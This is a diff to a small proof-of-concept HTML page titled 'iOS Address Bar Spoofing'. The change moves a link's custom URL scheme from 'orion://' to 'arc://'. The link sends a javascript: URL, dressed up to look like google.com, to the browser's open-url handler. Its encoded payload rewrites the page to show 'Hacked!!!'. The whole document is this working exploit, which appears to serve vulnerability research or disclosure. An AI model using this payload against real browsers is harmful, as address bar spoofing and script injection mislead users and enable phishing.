--- a/CustomScheme.html
+++ b/CustomScheme.html
@@ -1,4 +1,4 @@
 <h1>iOS Address Bar Spoofing</h1>
 Please tap following link in Safari.
 <hr>
-<a href="orion://open-url?url=javascript://google.com%2Fsearch?q=foo%26source=%2F%250adocument.body.innerHTML='%253ch1%2520style=color:red%253eHacked!!!'"><h2>Tap Here!</h2></a><br>
+<a href="arc://open-url?url=javascript://google.com%2Fsearch?q=foo%26source=%2F%250adocument.body.innerHTML='%253ch1%2520style=color:red%253eHacked!!!'"><h2>Tap Here!</h2></a><br>
